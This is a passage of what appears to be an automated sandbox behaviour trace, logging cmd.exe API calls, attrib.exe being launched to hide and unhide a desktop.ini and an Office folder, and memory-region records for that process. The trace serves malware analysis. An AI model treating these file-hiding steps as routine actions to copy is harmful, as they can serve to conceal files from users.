lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.580] _close (_FileHandle=4) returned 0 [0152.581] FindNextFileW (in: hFindFile=0x302810, lpFindFileData=0x1af0e8 | out: lpFindFileData=0x1af0e8) returned 0 [0152.581] GetLastError () returned 0x12 [0152.581] FindClose (in: hFindFile=0x302810 | out: hFindFile=0x302810) returned 1 [0152.581] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0152.583] _close (_FileHandle=3) returned 0 [0152.583] GetConsoleTitleW (in: lpConsoleTitle=0x1af520, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.584] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.584] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0152.584] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.584] GetLastError () returned 0x2 [0152.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.584] GetLastError () returned 0x2 [0152.584] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0x302e80 [0152.584] FindClose (in: hFindFile=0x302e80 | out: hFindFile=0x302e80) returned 1 [0152.584] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.585] GetLastError () returned 0x2 [0152.585] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0x302e80 [0152.585] FindClose (in: hFindFile=0x302e80 | out: hFindFile=0x302e80) returned 1 [0152.585] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0152.585] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0152.585] GetConsoleTitleW (in: lpConsoleTitle=0x1af2b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.585] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af13c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af204 | out: lpAttributeList=0x1af13c, lpSize=0x1af204) returned 1 [0152.585] UpdateProcThreadAttribute (in: lpAttributeList=0x1af13c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af1fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af13c, lpPreviousValue=0x0) returned 1 [0152.585] GetStartupInfoW (in: lpStartupInfo=0x1af0f8 | out: lpStartupInfo=0x1af0f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0152.585] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0152.585] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af198*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af1e4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", lpProcessInformation=0x1af1e4*(hProcess=0x4c, hThread=0x50, dwProcessId=0x56c, dwThreadId=0xd5c)) returned 1 [0152.587] CloseHandle (hObject=0x50) returned 1 [0152.587] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0152.587] GetEnvironmentStringsW () returned 0x302e80* [0152.587] FreeEnvironmentStringsW (penv=0x302e80) returned 1 [0152.587] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0152.621] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af0d8 | out: lpExitCode=0x1af0d8*=0x0) returned 1 [0152.621] CloseHandle (hObject=0x4c) returned 1 [0152.621] _vsnwprintf (in: _Buffer=0x1af220, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af0e4 | out: _Buffer="00000000") returned 8 [0152.621] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0152.621] GetEnvironmentStringsW () returned 0x302e80* [0152.621] FreeEnvironmentStringsW (penv=0x302e80) returned 1 [0152.621] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0152.621] GetEnvironmentStringsW () returned 0x302e80* [0152.621] FreeEnvironmentStringsW (penv=0x302e80) returned 1 [0152.621] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af13c | out: lpAttributeList=0x1af13c) [0152.621] GetConsoleTitleW (in: lpConsoleTitle=0x1af520, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.622] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.622] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0152.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.622] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.622] GetLastError () returned 0x2 [0152.622] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.622] GetLastError () returned 0x2 [0152.622] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0x302810 [0152.622] FindClose (in: hFindFile=0x302810 | out: hFindFile=0x302810) returned 1 [0152.622] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.623] GetLastError () returned 0x2 [0152.623] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0x302810 [0152.623] FindClose (in: hFindFile=0x302810 | out: hFindFile=0x302810) returned 1 [0152.623] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0152.623] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0152.623] GetConsoleTitleW (in: lpConsoleTitle=0x1af2b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.623] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af13c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af204 | out: lpAttributeList=0x1af13c, lpSize=0x1af204) returned 1 [0152.623] UpdateProcThreadAttribute (in: lpAttributeList=0x1af13c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af1fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af13c, lpPreviousValue=0x0) returned 1 [0152.623] GetStartupInfoW (in: lpStartupInfo=0x1af0f8 | out: lpStartupInfo=0x1af0f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0152.623] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0152.623] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af198*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af1e4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", lpProcessInformation=0x1af1e4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xda4, dwThreadId=0xd54)) returned 1 [0152.625] CloseHandle (hObject=0x4c) returned 1 [0152.625] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0152.626] GetEnvironmentStringsW () returned 0x3038e0* [0152.626] FreeEnvironmentStringsW (penv=0x3038e0) returned 1 [0152.626] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0152.660] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af0d8 | out: lpExitCode=0x1af0d8*=0x0) returned 1 [0152.660] CloseHandle (hObject=0x50) returned 1 [0152.660] _vsnwprintf (in: _Buffer=0x1af220, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af0e4 | out: _Buffer="00000000") returned 8 [0152.660] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0152.661] GetEnvironmentStringsW () returned 0x3038e0* [0152.661] FreeEnvironmentStringsW (penv=0x3038e0) returned 1 [0152.661] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0152.661] GetEnvironmentStringsW () returned 0x3038e0* [0152.661] FreeEnvironmentStringsW (penv=0x3038e0) returned 1 [0152.661] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af13c | out: lpAttributeList=0x1af13c) [0152.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.661] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.661] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.661] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.661] SetConsoleInputExeNameW () returned 0x1 [0152.661] GetConsoleOutputCP () returned 0x1b5 [0152.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.661] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.662] exit (_Code=0) Process: id = "248" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0xc54" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20363 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20364 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20365 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20366 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 20367 start_va = 0xb40000 end_va = 0xb46fff entry_point = 0xb40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20368 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20369 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20370 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20371 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 20372 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20373 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20374 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20375 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 20376 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20377 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 20378 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20379 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20380 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20381 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20382 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20383 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20384 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20385 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20386 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20387 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20388 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20389 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20390 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 20391 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = 